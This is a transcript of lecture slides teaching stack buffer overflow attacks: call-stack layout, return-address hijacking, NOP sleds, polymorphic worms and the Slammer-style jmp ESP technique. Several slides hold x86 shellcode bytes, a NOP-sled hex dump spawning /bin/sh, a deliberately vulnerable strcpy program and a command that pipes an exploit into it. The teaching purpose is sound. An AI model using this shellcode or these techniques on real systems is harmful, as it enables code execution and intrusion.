ch5 buffer overflow concept
TRANSCRIPT
-
8/9/2019 Ch5 Buffer Overflow Concept
1/69
Buffer Overflow
Attack Concept
-
8/9/2019 Ch5 Buffer Overflow Concept
2/69
Outline
Background
Basic Concept
Attack Flow NOP technique
Attack Example: Slammer
2
-
8/9/2019 Ch5 Buffer Overflow Concept
3/69
3
Essential attack method
Try a web search for buffer overflow exploit.
Check alt.2600, rootshell.com, antionline.com
you can find long lists ofexploits based on bufferoverflow.
Even the original version of ssh had a problem!
(after they made a big deal that there were nobuffer overflow problems in their code).
-
8/9/2019 Ch5 Buffer Overflow Concept
4/69
4
The Problem
void foo(char *s) {
char buf[10];
strcpy(buf,s);
printf(buf is %s\n,s);
}
foo(thisstringistolongforfoo);
-
8/9/2019 Ch5 Buffer Overflow Concept
5/69
5
Exploitation
The general idea is to give programs (servers) verylarge strings that will overflow a buffer.
For a server with sloppy code its easy to crashthe server by overflowing a buffer (SEGVtypically).
Its sometimes possible to actually make theserver do whatever you want (instead ofcrashing).
-
8/9/2019 Ch5 Buffer Overflow Concept
6/69
Buffer OverflowSome unsafe functions in C library:strcpy(char *dest, const char *src);
strcat(char *dest, const char *src);
getwd(char *buf);
gets(char *s);
fscanf(FILE *stream, const char *format, ...);
scanf(const char *format, ...);realpath(char *path, char resolved_path[]);
sprintf(char *str, const char *format);
6
No
Verification
-
8/9/2019 Ch5 Buffer Overflow Concept
7/69
7
Background Necessary
C functions and the stack.
A little knowledge of assembly/machine
language. How system calls are made (at the level of
machine code level).
exec() system calls
How to guess some key parameters.
-
8/9/2019 Ch5 Buffer Overflow Concept
8/69
8
CPU/OS dependency
Building an exploit requires knowledge of the
specific CPU and operating system of the
target.
Ill just talk about x86 and Linux, but the
methods work for other CPUs and OSs.
Some details are very different, but the
concepts are the same.
-
8/9/2019 Ch5 Buffer Overflow Concept
9/69
Outline
Background
Basic Concept
Attack Flow
NOP technique
Attack Example: Slammer
9
-
8/9/2019 Ch5 Buffer Overflow Concept
10/69
10
C Call Stack
When a function call is made, the return
address is put on the stack.
Often the values of parameters are put on thestack.
Usually the function saves the stack frame
pointer (on the stack).
Local variables are on the stack.
-
8/9/2019 Ch5 Buffer Overflow Concept
11/69
11
-
8/9/2019 Ch5 Buffer Overflow Concept
12/69
Stack
12
-
8/9/2019 Ch5 Buffer Overflow Concept
13/69
13
High
Low
Stack
Growth
String
Growth
Arguments
Return address
Prev. frame pointer
Local variables
Stack
Pointer
-
8/9/2019 Ch5 Buffer Overflow Concept
14/69
14
Stack Direction
On Linux (x86) the stack grows from high
addresses to low.
Pushing something on the stack moves the
Top Of Stack towards the address 0.
-
8/9/2019 Ch5 Buffer Overflow Concept
15/69
15
Parameters
Return AddressCalling Frame Pointer
Local Variables
A Stack Frame
00000000
Addresses
SP
SP+offset
-
8/9/2019 Ch5 Buffer Overflow Concept
16/69
16
Sample
Stack
18
addressof(y=3) return address
saved stack pointer
y
x
buf
x=2;
foo(18);
y=3;
void foo(int j) {
int x,y;
char buf[100];
x=j;
}
-
8/9/2019 Ch5 Buffer Overflow Concept
17/69
17
Smashing the Stack*
The general idea is to overflow a buffer so
that it overwrites the return address.
When the function is done it will jump towhatever address is on the stack.
We put some code in the buffer and set the
return address to point to it!
-
8/9/2019 Ch5 Buffer Overflow Concept
18/69
18
Before and After
void foo(char *s) {
char buf[100];
strcpy(buf,s);
address ofs
return-address
saved sp
buf
address ofs
pointer to pgm
Small Program
-
8/9/2019 Ch5 Buffer Overflow Concept
19/69
19
High
Low
Stack
Growth
String
Growth
Arguments
Return address
Prev. frame pointer
Local variables
Stack
Pointer
-
8/9/2019 Ch5 Buffer Overflow Concept
20/69
20
High
Low
Stack
Growth
String
Growth
Arguments
Return address
Prev. frame pointer
Local variables
Stack
Pointer
bar( )
{}
foo( )
{
call bar( );
}
foo
bar
-
8/9/2019 Ch5 Buffer Overflow Concept
21/69
21
int bar(int a, int b){
int i, j;char buf[9];
i = 5;j = 123;strcpy(buf, securephdbcde);
}
b
a
high
low
ret address
SFP
05 00 00 00
65 00 00 00
64 62 63 64
72 65 70 68
73 65 63 75Buffer Overflow
5
e
d b c d
r e p h
s e c u
-
8/9/2019 Ch5 Buffer Overflow Concept
22/69
22
int bar(int a, int b){
int i, j;char buf[9];
i = 5;j = 123;strcpy(buf,
securephdaaabbbbcccceeeeffff);}
b
a
high
low
ret address
SFP5
123
63 63 63 63
62 62 62 62
64 61 61 61
72 65 70 6873 65 63 75
65 65 65 65
64 64 64 64
Ret Overflow
Segmentation fault...
RetAddr = 0x65656565
-
8/9/2019 Ch5 Buffer Overflow Concept
23/69
23
High
Low
Stack
Growth
String
Growth
Arguments
Return address
Prev. frame pointer
Local variables
Stack
Pointer
bar( )
{}
foo( )
{
call bar( );
}
foo
bar
-
8/9/2019 Ch5 Buffer Overflow Concept
24/69
24
High
Low
Stack
Growth
String
Growth
Arguments
Return address
Prev. frame pointer
Local variables
Stack
Pointer
bar( )
{}
foo( )
{
call bar( );
}
foo
bar
-
8/9/2019 Ch5 Buffer Overflow Concept
25/69
Outline
Background
Basic Concept
Attack Flow
NOP technique
Attack Example: Slammer
25
-
8/9/2019 Ch5 Buffer Overflow Concept
26/69
Control Flow Hijack
I want my code executed!
Malicious code injection
Control flow redirection/hijacking
26
code code
codecode
Virus
Worm
-
8/9/2019 Ch5 Buffer Overflow Concept
27/69
A Single Packet Exploit
27
Attack CodeExploit
(ReturnAddr)
Return Address == 0x4739a304
-
8/9/2019 Ch5 Buffer Overflow Concept
28/69
28
Issues
How do we know what value the pointer
should have (the new return address).
Its the address of the buffer, but how do we know
what address this is?
How do we build the small program and put
it in a string?
-
8/9/2019 Ch5 Buffer Overflow Concept
29/69
29
Guessing Addresses
Typically you need the source code so you can
estimate the address of both the buffer and
the return-address.
An estimate is often good enough! (more on
this in a bit).
-
8/9/2019 Ch5 Buffer Overflow Concept
30/69
30
Building the
small program
Typically, the small program stuffed in to the
buffer does anexe
c().
Sometimes it changes the password db or
other files
-
8/9/2019 Ch5 Buffer Overflow Concept
31/69
31
exec()
In Unix, the way to run a new program is withthe exec() system call.
There is actually afamilyofexec() system
calls This doesn't create a new process, it changes the
current process to a new program.
To create a new process you need something else
( fork() ).
-
8/9/2019 Ch5 Buffer Overflow Concept
32/69
32
exec() example
#include
char *args[] = {"/bin/ls", NULL};
voidexecls(void) {
execv("/bin/ls",args);
printf(Im not printed\n");
}
-
8/9/2019 Ch5 Buffer Overflow Concept
33/69
33
Generating a String
You can take code like the previous slide, and
generate machine language.
Copy down the individual byte values andbuild a string.
To do a simple exec requires less than 100
bytes.
-
8/9/2019 Ch5 Buffer Overflow Concept
34/69
34
A Sample Program/String
Does an exec() of /bin/ls:
unsigned char cde[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0
\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c
\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/ls";
-
8/9/2019 Ch5 Buffer Overflow Concept
35/69
35
Some important issues
The small program should be position-
independent able to run at any memory
location.
It cant be too large, or we cant fit the
program and the new return-address on the
stack!
-
8/9/2019 Ch5 Buffer Overflow Concept
36/69
36
Sample Overflow Programunsigned char cde[] = "\xeb\x1f\
void tst(void) {
int *ret;
ret = (int *)&ret+2; // pointer arith!
(*ret) = (int) cde; //change ret addr}
int main(void) {
printf("Running tst\n");tst();
printf("foo returned\n");
}
-
8/9/2019 Ch5 Buffer Overflow Concept
37/69
37
Attacking a real program
Recall that the idea is to feed a server a string
that is too big for a buffer.
T
his string overflows the buffer and overwritesthe return address on the stack.
Assuming we put our small program in the
string, we need to know its address.
-
8/9/2019 Ch5 Buffer Overflow Concept
38/69
Outline
Background
Basic Concept
Attack Flow NOP technique
Attack Example: Slammer
38
-
8/9/2019 Ch5 Buffer Overflow Concept
39/69
39
NOPs
Most CPUs have a No-Operation instruction
it does nothing but advance the instruction
pointer.
Usually we can put a bunch of these ahead of
our program (in the string).
As long as the new return-address points to a
NOP we are OK.
-
8/9/2019 Ch5 Buffer Overflow Concept
40/69
40
0000000 9090 9090 9090 9090 9090 9090 9090 9090
*
00001f0 9090 9090 22eb 895e 89f3 83f7 07c7 c031
0000200 89aa 89f9 abf0 fa89 c031 b0ab 0408 cd03
0000210 3180 89db 40d8 80cd d9e8 ffff 2fff 6962
0000220 2f6e 6873 f822 bfff f822 bfff f822 bfff
0000230 f822 bfff f822 bfff f822 bfff f822 bfff
*
00004a0 f822 bfff f822 bfff f822 bfff 9090 9090
00004b0 fa48 bfff
Example
-
8/9/2019 Ch5 Buffer Overflow Concept
41/69
41
0000000 9090 9090 9090 9090 9090 9090 9090 9090
*
00001f0 9090 9090 22eb 895e 89f3 83f7 07c7 c031
0000200 89aa 89f9 abf0 fa89 c031 b0ab 0408 cd03
0000210 3180 89db 40d8 80cd d9e8 ffff 2fff 6962
0000220 2f6e 6873 f822 bfff f822 bfff f822 bfff
0000230 f822 bfff f822 bfff f822 bfff f822 bfff
*
00004a0 f822 bfff f822 bfff f822 bfff 9090 9090
00004b0 fa48 bfff
Example: NOP-sled
Sometime we can not easily determine the exact
memory address to jump into
-
8/9/2019 Ch5 Buffer Overflow Concept
42/69
NOP Sled Engineering
42
Attack CodeExploit
(ReturnAddr)
Attack CodeExploit
(ReturnAddr)
NOP NOP
NOP NOP
code[] = \xeb\x2a\x5f\xc6\x47\x07\x00\x89\x7f\x08\xc7\x47;
strcpy(buf, code);
buf = \xeb\x2a\x5f\xc6\x47\x07
And, sometimes, we simply want to find a way to avoid \x00.
-
8/9/2019 Ch5 Buffer Overflow Concept
43/69
Detecting NOP Sleds
Intrusion Prevention Systems or Advanced
Firewalls
43
IntrusionPreventionSystem
Legacy
victims
packet packet
analyze &drop
NOP Sled
Signatures
-
8/9/2019 Ch5 Buffer Overflow Concept
44/69
attack polymorphism
(many different ways)
44
Attack CodeExploit
(ReturnAddr)
Attack CodeExploit
(ReturnAddr)
Decryption
Code
The Signature Explosion Problem!!
-
8/9/2019 Ch5 Buffer Overflow Concept
45/69
45
0000000 9090 9090 9090 9090 9090 9090 9090 9090
*
00001f0 9090 9090 22eb 895e 89f3 83f7 07c7 c031
0000200 89aa 89f9 abf0 fa89 c031 b0ab 0408 cd03
0000210 3180 89db 40d8 80cd d9e8 ffff 2fff 6962
0000220 2f6e 6873 f822 bfff f822 bfff f822 bfff
0000230 f822 bfff f822 bfff f822 bfff f822 bfff
*
00004a0 f822 bfff f822 bfff f822 bfff 9090 9090
00004b0 fa48 bfff
A WORM with a NOP-Sled
-
8/9/2019 Ch5 Buffer Overflow Concept
46/69
NOP sleds
NOP sled can/will NOT be a useful signature
in detecting future WORMs
80~90% of the WORMs today dont really
need NOP sleds but, historically, they are
still left there.
46
-
8/9/2019 Ch5 Buffer Overflow Concept
47/69
Memory Address Ranges
47
Arguments
Return address
Prev. frame pointer
Local variables
Arguments
Return address
Prev. frame pointer
Local variables
One Exploithas one return address value, but anotherexploit based on the same vulnerability might be using a
different return address.
-
8/9/2019 Ch5 Buffer Overflow Concept
48/69
48
Using NOPs
Real program(exec /bin/ls or whatever)
new return address
nop instructions
-
8/9/2019 Ch5 Buffer Overflow Concept
49/69
49
Estimating the stack size
We can also guess at the location of the return
address relative to the overflowed buffer.
Put in a bunch of new return addresses!
-
8/9/2019 Ch5 Buffer Overflow Concept
50/69
50
Estimating the Location
Real program
new return address
nop instructions
new return address
new return addressnew return address
new return addressnew return address
-
8/9/2019 Ch5 Buffer Overflow Concept
51/69
51
vulnerable.c
void foo( char *s ) {char name[200];
strcpy(name,s);
printf("Name is %s\n",name);
}int main(void) {
char buf[2000];
read(0,buf,2000);
foo(buf);
}
-
8/9/2019 Ch5 Buffer Overflow Concept
52/69
52
genpgm.c
genpgm.c was constructed to exploit the
buffer overflow in vulnerable.c
It allows he user to add an offset to a fixed
guess of the address of the return-
address on the stack.
It writes (to stdout) a string that contains a
bunch of return-addresses and a programthat does: exec /bin/ls.
-
8/9/2019 Ch5 Buffer Overflow Concept
53/69
53
Testing
./genpgm 16 | ./vulnerable
Get ambitious! Change the program output bygenpgm to exec /bin/sh!
(./genpgm; cat) | ./vulnerable
-
8/9/2019 Ch5 Buffer Overflow Concept
54/69
54
IPUPR. LYR. PAYLOAD TCP/UDP HDRAttack CodeExploit
(ReturnAddr)
Decryption
Code
NOP NOP
NOP NOP System State Changes
How can each of
the stages be
polymorphic?
-
8/9/2019 Ch5 Buffer Overflow Concept
55/69
DEMOSTRATIONOFBUFFEROVERFLOW
http://www.youtube.com/watch?v=ZZ0LVAFIDrA
55
-
8/9/2019 Ch5 Buffer Overflow Concept
56/69
Outline
Background
Basic Concept
Attack Flow NOP technique
Attack Example: Slammer
56
-
8/9/2019 Ch5 Buffer Overflow Concept
57/69
Attack technique
ESP
Stack Pointer
jmp ESP
Use ESP register to record attack code execution
address:
EBP
Stack Base
57
-
8/9/2019 Ch5 Buffer Overflow Concept
58/69
58
High
Low
Stack
Growth
Arguments
Return address
Prev. frame pointer
Local variables
Stack
Pointer
jmp ESP
foo
barret
11,000
-
8/9/2019 Ch5 Buffer Overflow Concept
59/69
Attack flow
59
Start:
CALL FunctionWithBufferOverflow
FunctionWithBuffe
rOve
rflow:PUSH EBP
MOV EBP,ESP
CALL OverflowMyBuffer
POP EBP
RET
-
8/9/2019 Ch5 Buffer Overflow Concept
60/69
60
Start:
CALL FunctionWithBufferOverflow
FunctionWithBufferOverflow:
PUSH EBP
MOV EBP,ESP
CALL OverflowMyBuffer
POP EBP
RET
ESP
-
8/9/2019 Ch5 Buffer Overflow Concept
61/69
Start+6
61
Start:
CALL FunctionWithBufferOverflow
FunctionWithBufferOverflow:
PUSH EBP
MOV EBP,ESP
CALL OverflowMyBuffer
POP EBP
RET
ESP
Return
address
-
8/9/2019 Ch5 Buffer Overflow Concept
62/69
Start+6
Old EBP
62
Start:
CALL FunctionWithBufferOverflow
FunctionWithBufferOverflow:
PUSH EBP
MOV EBP,ESP
CALL OverflowMyBuffer
POP EBP
RET
ESP
Return
address
Old EBP
-
8/9/2019 Ch5 Buffer Overflow Concept
63/69
Start+6
Old EBP
63
Start:
CALL FunctionWithBufferOverflow
FunctionWithBufferOverflow:
PUSH EBP
MOV EBP,ESP
CALL OverflowMyBuffer
POP EBP
RET
ESP/EBP
MyB
uffer
Return
address
Old EBP
-
8/9/2019 Ch5 Buffer Overflow Concept
64/69
Attack8
Attack7
Attack6
Attack5
Attack4
Attack3
Attack2
Attack1
Attack0
64
Start:
CALL FunctionWithBufferOverflow
FunctionWithBufferOverflow:
PUSH EBP
MOV EBP,ESP
CALL OverflowMyBuffer
POP EBPRET
ESP/EBP
MyB
uffer
Return
address
Old EBP
-
8/9/2019 Ch5 Buffer Overflow Concept
65/69
Attack8
Attack7
Attack6
Attack5
Attack4
Attack3
Attack2
Attack1
Attack0
65
Start:
CALL FunctionWithBufferOverflow
FunctionWithBufferOverflow:
PUSH EBP
MOV EBP,ESP
CALL OverflowMyBuffer
POP EBPRET
ESP
MyBuffer
(EBP == Attack5)
code
jmp ESP
Return
address
-
8/9/2019 Ch5 Buffer Overflow Concept
66/69
Results
This is how Slammer worked, Sasser is very
similar, as are a couple of others
Bogus return pointer is Attack6, payload starts
at Attack7
66
-
8/9/2019 Ch5 Buffer Overflow Concept
67/69
Jump to other registers
EBX
base register of indexing the buffer base
Code Red II , Blaster RPC DCOM used EBX
JMP EBX :0xff 0xd3=> 0x0100139d
EDI
destination register for string operations
ASN.1 uses EDI
67
-
8/9/2019 Ch5 Buffer Overflow Concept
68/69
68
High
Low
Stack
Growth
Arguments
Return address
Prev. frame pointer
Local variables
Stack
Pointer
jmp ESP
foo
barret
jmp EBX
-
8/9/2019 Ch5 Buffer Overflow Concept
69/69
Register Spring+Polymorphic
Attack Code Exploit(RegisterSpring)
DecryptionCode
NOP NOPNOP NOP
????
0x0100139d